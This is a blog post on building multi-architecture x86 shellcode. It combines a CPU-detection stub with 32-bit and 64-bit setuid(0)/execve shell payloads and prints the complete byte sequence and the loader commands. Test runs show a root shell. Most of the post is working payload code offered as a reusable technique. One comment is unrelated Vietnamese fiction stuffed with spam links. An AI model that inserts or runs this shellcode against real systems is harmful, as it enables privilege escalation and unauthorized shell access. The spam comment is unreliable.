Thursday, August 29, 2013

Building multi-architecture shellcode with shellcodecs

Earlier when I documented alphanumeric shellcode I released a stub that allows you to determine the x86 cpu architecture that I called a 'getcpu'. Using a few tools from shellcodecs, I was able to combine it with a couple of other shellcodes and test the compatibility locally.

Building a 32-bit shellcode loader on a multilib system

The first thing I did was take the 32-bit loader found in shellcodecs and built it on my 64-bit system to get a decent test environment going.
root@box:~/Downloads/shellcode/loaders# as --32 loader-32.s -o loader-32.o
root@box:~/Downloads/shellcode/loaders# ld -m elf_i386 loader-32.o -o loader-32

Initial codes

I picked out two setuid(0); execve('/bin/bash',null,null) shellcodes: a 32-bit shellcode used in our buffer overflow wiki, and the 64-bit version that I wrote for shellcodecs, giving us the three portions of code below.
 • The getCPU stub:
  TX4HPZTAZAYVH92
  
 • The 32-bit payload:
  \xeb\x1f\x5e\x89\x76\x08
  \x31\xc0\x88\x46\x07\x89
  \x46\x0c\xb0\x0b\x89\xf3
  \x8d\x4e\x08\x8d\x56\x0c
  \xcd\x80\x31\xdb\x89\xd8
  \x40\xcd\x80\xe8\xdc\xff
  \xff\xff/bin/sh
  
 • The 64-bit payload:
  \x48\x31\xff\x6a\x69\x58
  \x0f\x05\x57\x57\x5e\x5a
  \x6a\x68\x48\xb8\x2f\x62
  \x69\x6e\x2f\x62\x61\x73
  \x50\x54\x5f\x6a\x3b\x58
  \x0f\x05
  
I got the 64-bit payload using the following command from a compiled shellcodecs installation:
generators/shellcode-generator.py --file null-free/setuid_binsh --hex

Tying them together

The 64-bit payload is 32 bytes. In hex, this is represented with 0x20 or \x20. Because the getCPU sets the zflag on 32-bit and doesn't on 64-bit, I took the GetCPU and added a conditional jump if equal 0x20 ("t\x20"):
TX4HPZTAZAYVH92t\x20
The idea here is that if its on a 32-bit system, it will jump over the 64-bit payload and execute the 32-bit system. If its on a 64-bit system, it will execute the 64-bit code without continuing to the 32-bit code because execve() is blocking. I appended the 64-bit payload, followed by the 32-bit payload to our altered getCPU with the conditional jump:
TX4HPZTAZAYVH92t\x20
\x48\x31\xff\x6a\x69
\x58\x0f\x05\x57\x57
\x5e\x5a\x6a\x68\x48
\xb8\x2f\x62\x69\x6e
\x2f\x62\x61\x73\x50
\x54\x5f\x6a\x3b\x58
\x0f\x05\xeb\x1f\x5e
\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46
\x0c\xb0\x0b\x89\xf3
\x8d\x4e\x08\x8d\x56
\x0c\xcd\x80\x31\xdb
\x89\xd8\x40\xcd\x80
\xe8\xdc\xff\xff\xff
/bin/sh
This comes out to 94 bytes.

Testing the shellcode

 • On 32-bit:
  root@box:~/Downloads/shellcode/loaders# ./loader-32 "$(echo -en "TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")"
  # id
  uid=0(root) gid=0(root) groups=0(root)
  # exit
  
 • On 64-bit:
  root@box:~/Downloads/shellcode/loaders# ./loader-64 "$(echo -en "TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")"
  root@box:/home/hats/Downloads/shellcode/loaders# id
  uid=0(root) gid=0(root) groups=0(root)
  root@box:/home/hats/Downloads/shellcode/loaders# exit
  exit
  
This same tricks works for windows shellcodes as well, the getCPU stub does not interfere with operating system internals or cause exceptions to be raised.

3 comments:

 1. Part 2:

  http://www.chokepoint.net/2013/09/building-multiplatform-shellcode-header.html

  ReplyDelete
  Replies
  1. Một âm thanh hùng hậu truyền tới, thanh âm này tràn ngập vẻ tức giận.

   - Hôm nay ta không có ý định đi, trong kết giới này không ở một tháng thì không xong, yên tâm ta không ở đây được một tháng thì sẽ không đi.

   Thanh âm của Nhạc Thành vang lên ở trên không trung.

   - Đại Song, Tiểu Song mọi người bày trận, phía trước có không ít người tới.

   Ở trong một sơn cốc bát ngát, Nhạc Thành ra hiệu cho mọi người dừng lại, sau đó nói Đại Song và Tiểu Song bày trậy nghìn người này thực lực không cao, nhưngdongtam
   mu private
   tim phong tro
   http://nhatroso.com/
   nhac san cuc manh
   tổng đài tư vấn luật
   http://dichvu.tuvanphapluattructuyen.com/
   văn phòng luật
   tổng đài tư vấn pháp luật
   thành lập công ty
   http://we-cooking.com/
   chém gió
   trung tâm ngoại ngữ đánh chết tất cả thì vô cùng phiền toái, Nhạc Thành chỉ đem ba trăm người thuộc đội hộ vệ Kim Long tới đây, tuy nhiên hắn còn có Thiên Long Phục Ma trận của mình và Thiên Phần Tiên trận của Đại Song và Tiểu Song, có thể giết những người tu vi Đấu Tôn, Đấu Tông Đấu hoàng này dễ dàng.

   Dĩ nhiên Thiên Phần Tiên Trận vây hãm người số lượng nhiều sẽ tiêu hao pháp lực của Đại Song

   Delete
 2. What is this getcpu stub?

  ReplyDelete